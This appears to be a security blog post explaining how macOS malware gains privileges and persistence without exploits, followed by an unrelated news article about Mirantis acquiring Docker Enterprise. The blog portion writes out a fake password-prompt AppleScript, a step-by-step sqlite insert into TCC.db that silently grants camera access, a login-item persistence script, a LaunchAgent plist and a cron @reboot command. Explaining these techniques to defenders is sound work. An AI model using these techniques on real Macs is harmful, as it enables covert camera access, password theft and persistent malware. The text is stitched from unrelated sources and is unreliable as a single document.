Among security researchers and bug bounty hunters, obtaining unauthorized elevated privileges – privilege escalation – is widely held to be the hacker’s holy grail: an achievement that can be paved with gold, as bounty programs, private zero-day hoarders and Pwn2Own-style competitions reward such exploits with handsome amounts of hard cash. As we saw in Part I, Apple’s regular product security updates are frequently littered with a variety of arbitrary code execution and privilege escalation vulnerabilities found by researchers both public and private. Despite this, the vulnerabilities and exploits discovered by researchers are not widely used in the wild by macOS threat actors, largely because those actors have found other ways to the same end. In this post, we continue our look at the role of privilege escalation on macOS from the point of view of malware developers and how they take a different path.

image privilege escalation part 2

Where’s the Harm in Asking?

Much of the commodity malware and adware seen on macOS doesn’t avail itself of the kind of privilege escalation exploits we looked at last time. That’s not only because such exploits typically have a limited shelf life; it’s also that developing them is not time well spent. Most users, incredibly but not surprisingly, will happily grant elevated privileges if you only ask!

This direct route to elevation is partly engendered by the fact that Mac users are conditioned by both frequency and repetition to seeing authorization requests when they install or move applications, move or copy files or programs from one location to another outside of their home folders, and now – more than ever – to grant applications access rights to many common system services such as Contacts, Calendars and Photos, something we’ll discuss below in detail.

Examples of “ask and hope” are easy to find among macOS commodity adware and malware; in fact, they are the norm, precisely because users are easily socially engineered into installing some program or opening some file that they believe is going to be useful, informative or otherwise beneficial to what they are currently doing. 

Malware developers, PUPs/PUAs and adware make regular use of the built-in Installer.app and .pkg file format, just like legitimate apps. They know that most users will click through the installer wizard and never stop to check the install.log to see what is really going on, let alone use a tool like Suspicious Package to inspect what the package contains.

image of suspicious package

Below is just one example of a common malicious installer.

image of PUP ADWARE installer
image of installer log

Genuine uses of the API that requests elevated permissions do not expose the password to the calling process, but malware authors typically just fake the dialog box and capture the password in plain text, which is easy to do.

image fake installer dialog box

It’s also fairly simple to use a bit of AppleScript to spoof a user into supplying a password with a pretty genuine-looking dialog box that even imports legitimate native icons for added authenticity:

image spoof password
image of spoof script
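The kind of spoof shown above can fit in a single line of AppleScript. Below is a sketch in shell that builds such a one-liner but deliberately only prints it rather than running it; the prompt text and icon path are made-up examples of the sort an attacker would use:

```shell
# Build (but deliberately do not execute) the kind of AppleScript
# one-liner used to spoof a password prompt. 'with hidden answer'
# masks the typed text, and pointing 'with icon' at a legitimate
# .icns file lends the dialog a native look.
spoof='display dialog "Finder wants to make changes. Type your password to allow this." default answer "" with hidden answer with icon file "System:Library:CoreServices:CoreTypes.bundle:Contents:Resources:FileVaultIcon.icns"'
# On a Mac, an attacker would run it with: osascript -e "$spoof"
printf '%s\n' "$spoof"
```

Unlike the genuine authorization dialog, whatever the victim types into the `default answer` field comes straight back to the calling script in plain text.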

And sometimes, even asking for root isn’t required. Famously, in the initial public release of macOS 10.13 High Sierra, an error allowed anyone to unlock a protected System Preferences pane simply with the username root and an empty password (the flaw, CVE-2017-13872, was fixed in macOS 10.13.1)!

Abusing Dialog Alerts – Can Click, Will Click

Legitimate requests for privileges or access to protected resources have always been highly uninformative, conditioning users to either take on trust that the process is benign or risk losing some desired functionality. 

Aware of this, Apple have recently made changes to Security & Privacy preferences, adding the requirement that for notarized apps, developers must provide an informative description to be displayed in the request dialog if they intend to access these protected resources.

While the intention is good, it’s unlikely that this extra “hoop” for legitimate developers to jump through will make any difference to malware authors. First, there’s no check on what information the developer provides, only that they provide some kind of description string. Second, even Apple’s own description strings are hardly any less confusing. For example, what could it possibly mean to most users to say one application will be able to access documents and data in Terminal.app? The Terminal app isn’t typically thought of as a location for storing documents and data, so that description is at best confusing. We suspect it means one app will have access to documents and data within the sandbox container of the other app, but even if that is correct, it is hardly helpful. The implications are left entirely for the user to discover the hard way: by clicking one of the buttons.

image of terminal app dialog

As a result, the requirement to provide a description string isn’t likely to be much help in judging whether an action is one the user wants to take. Third, and perhaps anecdotally, most people agree that such messages, even when they contain useful text, are rarely read before the button is clicked. Double that effect when the messages come thick and fast and are perceived as a hindrance to productivity.

Who Needs Sudo When The User is Admin?

Another reason why attackers on macOS don’t worry unduly about elevating privileges to root is that far and away the majority of macOS users are running as the default user that was set up when they first bought or were given their Mac. That default user is, of course, an admin user. The id command will quickly tell a process what access its user has.

image of id utility

A process generally has the privileges of the user who launches it, so clearly when the user is admin – as most are – that gives the process a lot of power to make changes, launch other processes and access resources.
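A process can make that check for itself in a couple of lines. The sketch below is portable shell; the `admin` group name is macOS’s convention for the default administrator group:

```shell
# Report what access the current process/user has: the uid, the
# group list, and whether the user is a member of the 'admin' group
# (the default on almost every consumer Mac).
uid=$(id -u)
groups=$(id -Gn)
echo "uid=$uid"
# Expand the space-separated group list one per line and test membership
if printf '%s\n' $groups | grep -qx admin; then
  echo "this user is an admin"
else
  echo "this user is not an admin"
fi
```

Malware routinely performs exactly this kind of reconnaissance early on to decide whether any escalation is needed at all.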


For example, until Mojave, any user-launched process could – without requesting any further interaction from the user – read the user’s email database, including encrypted emails, exfiltrate the browser’s entire browsing history and much more besides. These resources have supposedly been locked down, but various bypasses have already been revealed (see here and here, for example), and the protections are largely null and void in any case as soon as a user adds the Terminal to Full Disk Access, something that anyone who uses the Terminal is almost certainly going to do.

Any Hack Dropbox Can Do, Zoom Can Do Better

Which brings us to ways that malware authors can access protected resources even without asking. To tell this story, we need to pivot away from malicious developers to legitimate ones for a moment. 

Back in 2016, in my Revealing Dropbox’s dirty little security hack and a subsequent post, I exposed how Dropbox hacks System Preferences to forcibly insert itself into the Accessibility preferences pane giving itself permission to take control of the User Interface, regardless of what choices the user made in System Preferences.

image of dropbox hack

This hack was itself seen in various adware, PUP/PUAs and malware exploit kits. Following a lot of exposure on Hacker News and elsewhere, Apple took exception to this, and with the release of macOS Sierra a few months later locked down the TCC database that acts as the backing store for those rights.

With Mojave and Catalina, Apple added further controls to user privacy, again backed by the TCC SQLite database, including restricting access to the system camera and microphone. 

Beginning in macOS Mojave, users have to consent before an app can access the camera or microphone. And then macOS Catalina further requires consent to record the contents of your screen or the keys that you type on your keyboard.

Importantly, while Apple have made it possible to pre-approve some of the privacy preferences either at the user level or by Mac admins using MDM configuration profiles, they stressed at WWDC 2019 that access to the camera and microphone can only be pre-denied. Access to these resources can only be acquired at “time of use” through user approval: clicking an ‘Allow’ or ‘Deny’ button in a dialog that pops up when the resource is requested by an application.

Enter Zoom into the story. You may remember Zoom was recently in the news for using a hidden web server which, it turned out, could easily be hijacked by malicious actors to enable a user’s camera without their permission. It seems the controversy has not made the company any more shy about abusing loopholes in Apple’s security, albeit in a bid to provide a better experience for its users. Last week, Zoom hit the news again as a document the company itself published shows it had found and implemented another simple bypass of the Camera and Microphone permissions.

Credit here goes to GitHub user bp88, who developed an entire script for Jamf Pro users wanting to emulate the same effect, but let’s walk through it step by step to see how it works. We’ll use Calculator.app – clearly something that does not require access to the camera – for this demo.

First we have to gather a little information about the app we want to sneak into Privacy preferences, including its bundle identifier and code signature requirements.

$ plutil -p /System/Applications/Calculator.app/Contents/Info.plist | grep -i bundleidentifier

This returns com.apple.calculator.

We also need its code signing requirements in hex form. To get those, we use codesign to extract the requirements.

$ codesign -d -r- /System/Applications/Calculator.app

Which returns the following:

image of codesign utility

We only want the part after designated =>. We echo that into the csreq utility, which will give us a binary output that we’ll save to a temp file.

$ echo 'identifier "com.apple.calculator" and anchor apple' | csreq -r- -b /tmp/req.bin

Using xxd and tr, we take the binary file and convert it into the hex “blob” that the TCC.db expects.

$ xxd -p /tmp/req.bin | tr -d '\n'

We’ll wrap that blob inside X' ' as required by the database syntax.

X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003'

Finally we need a time stamp, which we can grab with 

$ date +"%s"

All we need to do now is construct our sqlite command based on the database’s schema and execute it.

$ sqlite3 "$HOME/Library/Application Support/com.apple.TCC/TCC.db" "INSERT INTO access (service,client,client_type,allowed,prompt_count,csreq,last_modified) VALUES('kTCCServiceCamera', 'com.apple.calculator', '0', '1', '1', X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003', 1573637690)"

gif image of zoom hack
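The steps above can be pulled together into one short sketch. The hex blob below is the one derived earlier for com.apple.calculator; on a real Mac it would be produced by the codesign/csreq/xxd pipeline rather than pasted in, and the final sqlite3 write is shown commented out since it only applies where TCC.db is writable:

```shell
# Consolidate the TCC.db walkthrough: build the INSERT statement that
# grants Calculator.app camera access without any user prompt.
bundle_id='com.apple.calculator'
service='kTCCServiceCamera'
req_hex='fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003'
ts=$(date +%s)   # last_modified timestamp, seconds since the epoch
db="$HOME/Library/Application Support/com.apple.TCC/TCC.db"
sql="INSERT INTO access (service,client,client_type,allowed,prompt_count,csreq,last_modified) VALUES('$service','$bundle_id','0','1','1',X'$req_hex',$ts)"
printf '%s\n' "$sql"
# The actual write (macOS only):
#   sqlite3 "$db" "$sql"
```

Note that the path to TCC.db contains a space, so it must be quoted when passed to sqlite3.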

While this is more of a horizontal privilege escalation – meaning, the level of rights remains the same, but the hack allows access to other resources that would normally require further user approval – it nevertheless demonstrates how macOS’s built-in security can easily be bypassed at the user level and without resorting to exploiting low-level vulnerabilities. Expect to see this hack used in the wild by RATs and other malware interested in hijacking the camera and microphone resources. 

Persistence Doesn’t Require Elevated Privileges

If you’ve ever logged in to a Mac only to unexpectedly find that some unwanted app launches itself and slows down the login process, you’ve just experienced the fact that apps don’t need permission or authentication to start up at user login time. With persistence being one of the major objectives of all malware, this is a feature that is widely abused.

There are several ways that apps can ensure they execute on login and before the user takes control of the Desktop, none of which require the application to obtain permission. 

First of all, an app can simply install itself into the Login Items list in System Preferences. Although use of this kind of persistence mechanism is formally deprecated, it’s still widely used and can even be done with a simple AppleScript.

tell application "System Events"
	-- list existing login items (not strictly needed; shown for context)
	name of every login item
	if (login item "Persistent App" exists) is false then
		-- resolve the running app's own path on disk...
		tell application process "Persistent App" to set aPath to POSIX path of its application file as string
		-- ...and register it to launch at every login, no authentication required
		make new login item at end of login items with properties {path:aPath, hidden:false, kind:"Application", name:"Persistent App"}
	end if
end tell


Second, the mechanism that is now officially recommended by Apple to replace deprecated Login Items actually makes it more difficult for users to review and manage. Login Items are now hidden within each application’s own bundle and are entirely managed within the application itself. Apple kindly point out to developers that the older API, unlike the new preferred mechanism, exposes their login item to user interference.

image of login item documentation

As we’ve mentioned before it is possible to enumerate which items are using Login Items, but this requires either writing custom code or running a script, which I’ve previously shared here.
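A minimal sketch of that enumeration is below. It assumes the new-style login items live where Apple documents them, inside each bundle at Contents/Library/LoginItems, and that apps are installed in /Applications:

```shell
# Enumerate new-style login items by looking inside each application
# bundle for an embedded Contents/Library/LoginItems helper app.
# Errors (unreadable bundles, missing directory) are silenced.
found=$(find /Applications -maxdepth 6 -type d -path '*/Contents/Library/LoginItems/*.app' 2>/dev/null)
result=${found:-"no bundled login items found"}
printf '%s\n' "$result"
```

Nothing comparable is surfaced in System Preferences, which is precisely the reviewability problem described above.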

Another root to persistence that does not require the malware authors to engage in privilege escalation techniques is to simply write a LaunchAgent to the user’s Library folder. The LaunchAgents folder does not require elevated permissions to write to, and is far and away the most prevalent persistence method used by malware on the Mac. That’s largely because most users have no idea that this folder exists – not helped by the fact that Apple chose to hide the user’s Library folder by default from 10.7 onwards – and most wouldn’t know what was safe or dangerous to do with it even if they did.
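A minimal sketch of the kind of property list such malware drops is below. It is written here to a temporary directory rather than ~/Library/LaunchAgents, and the label and payload path are made-up examples:

```shell
# A minimal user LaunchAgent. RunAtLoad tells launchd to start the
# program at every login; no password or admin rights are needed to
# create it. Real malware writes this to ~/Library/LaunchAgents.
dir=$(mktemp -d)
plist="$dir/com.example.persist.plist"
cat > "$plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.example.persist</string>
	<key>ProgramArguments</key>
	<array>
		<string>/tmp/payload.sh</string>
	</array>
	<key>RunAtLoad</key>
	<true/>
</dict>
</plist>
EOF
echo "wrote $plist"
# launchd would pick this up at the next login if it lived in
# ~/Library/LaunchAgents, or immediately via: launchctl load "$plist"
```

Spotting an unfamiliar label like this in ~/Library/LaunchAgents is often the quickest way to confirm an adware infection.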

Despite that, given the explosion in adware over the last couple of years, the role of LaunchAgents has started to attract a little more attention as adware-infected users turn to community forums seeking help. That in turn has led to a small but rising use of the old cron technology, which even fewer modern users are aware of. It still functions reliably on all versions of macOS right up to and including macOS 10.15 Catalina.

Notice how, in this example, the malware explicitly calls sudo, which throws a permission request at the user as they log in, with no explanation other than “confup wants to make changes”. Given the recent rash of infections we’re seeing of this particular item, it’s clearly successful.

image cron reboot
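Stripped of that unnecessary sudo call, the cron variant of this persistence can be as simple as a single user crontab line. The payload path below is a made-up example:

```shell
# The cron route to persistence: one user crontab entry, requiring no
# elevated privileges to install. @reboot runs the payload each time
# the machine starts up.
entry='@reboot /tmp/payload.sh'
printf '%s\n' "$entry"
# An attacker installs it non-interactively with something like:
#   (crontab -l 2>/dev/null; echo "$entry") | crontab -
```

Because `crontab -e` is the only interface most people know, entries installed this way tend to go unnoticed for a long time.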

Conclusion

Despite the active and perhaps competitive race among researchers to find the latest path to root, it is rare to see the kind of privilege escalation exploits they develop being actively used in the wild by attackers. What accounts for this disjunction between research and practice is the fact that there are multiple ways for malware authors to achieve their objectives with simpler and more durable techniques. Sometimes, as we’ve seen, privilege escalation isn’t even required, and where it is, social engineering or just a plain ask will often do the trick. While unpatched zero days will always be in the armoury of advanced attackers, for the majority of crimeware they are rarely needed.



Mirantis acquires Docker Enterprise

Mirantis today announced that it has acquired Docker’s Enterprise business and team. Docker Enterprise was very much the heart of Docker’s product lineup, so this sale leaves Docker as a shell of its former, high-flying unicorn self. Docker itself, which installed a new CEO earlier this year, says it will continue to focus on tools that will advance developers’ workflows. Mirantis will keep the Docker Enterprise brand alive, though, which will surely not create any confusion.

With this deal, Mirantis is acquiring Docker Enterprise Technology Platform and all associated IP: Docker Enterprise Engine, Docker Trusted Registry, Docker Unified Control Plane and Docker CLI. It will also inherit all Docker Enterprise customers and contracts, as well as its strategic technology alliances and partner programs. Docker and Mirantis say they will both continue to work on the Docker platform’s open-source pieces.

The companies did not disclose the price of the acquisition, but it’s surely nowhere near Docker’s valuation during any of its last funding rounds. Indeed, it’s no secret that Docker’s fortunes changed quite a bit over the years, from leading the container revolution to becoming somewhat of an afterthought after Google open-sourced Kubernetes and the rest of the industry coalesced around it. It still had a healthy enterprise business, though, with plenty of customers among large enterprises. The company says about a third of Fortune 100 and a fifth of Global 500 companies use Docker Enterprise, which is a statistic most companies would love to be able to highlight — and which makes this sale a bit puzzling from Docker’s side, unless the company assumed that few of these customers were going to continue to bet on its technology.

Update: for reasons only known to Docker’s communications team, we weren’t told about this beforehand, but the company also today announced that it has raised a $35 million funding round from Benchmark. This doesn’t change the overall gist of the story below, but it does highlight the company’s new direction.

Here is what Docker itself had to say. “Docker is ushering in a new era with a return to our roots by focusing on advancing developers’ workflows when building, sharing and running modern applications. As part of this refocus, Mirantis announced it has acquired the Docker Enterprise platform business,” Docker said in a statement when asked about this change. “Moving forward, we will expand Docker Desktop and Docker Hub’s roles in the developer workflow for modern apps. Specifically, we are investing in expanding our cloud services to enable developers to quickly discover technologies for use when building applications, to easily share these apps with teammates and the community, and to run apps frictionlessly on any Kubernetes endpoint, whether locally or in the cloud.”

Mirantis itself, too, went through its ups and downs. While it started as a well-funded OpenStack distribution, today’s Mirantis focuses on offering a Kubernetes-centric on-premises cloud platform and application delivery. As the company’s CEO Adrian Ionel told me ahead of today’s announcement, today is possibly the most important day for the company.

So what will Mirantis do with Docker Enterprise? “Docker Enterprise is absolutely aligned and an accelerator of the direction that we were already on,” Ionel told me. “We were very much moving towards Kubernetes and containers aimed at multi-cloud and hybrid and edge use cases, with these goals to deliver a consistent experience to developers on any infrastructure anywhere — public clouds, hybrid clouds, multi-cloud and edge use cases — and make it very easy, on-demand, and remove any operational concerns or burdens for developers or infrastructure owners.”

Mirantis previously had about 450 employees. With this acquisition, it gains another 300 former Docker employees that it needs to integrate into its organization. Docker’s field marketing and sales teams will remain separate for some time, though, Ionel said, before they will be integrated. “Our most important goal is to create no disruptions for customers,” he noted. “So we’ll maintain an excellent customer experience, while at the same time bringing the teams together.”

This also means that for current Docker Enterprise customers, nothing will change in the near future. Mirantis says that it will accelerate the development of the product and merge its Kubernetes and lifecycle management technology into it. Over time, it will also offer a managed services solution for Docker Enterprise.

While there is already some overlap between Mirantis’ and Docker Enterprise’s customer base, Mirantis will pick up about 700 new enterprise customers with this acquisition.

With this, Ionel argues, Mirantis is positioned to go up against large players like VMware and IBM/Red Hat. “We are the one real cloud-native player with meaningful scale to provide an alternative to them without lock-in into a legacy or existing technology stack.”

While this is clearly a day the Mirantis team is celebrating, it’s hard not to look at this as the end of an era for Docker, too. The company says it will share more about its future plans today, but didn’t make any spokespeople available ahead of this announcement.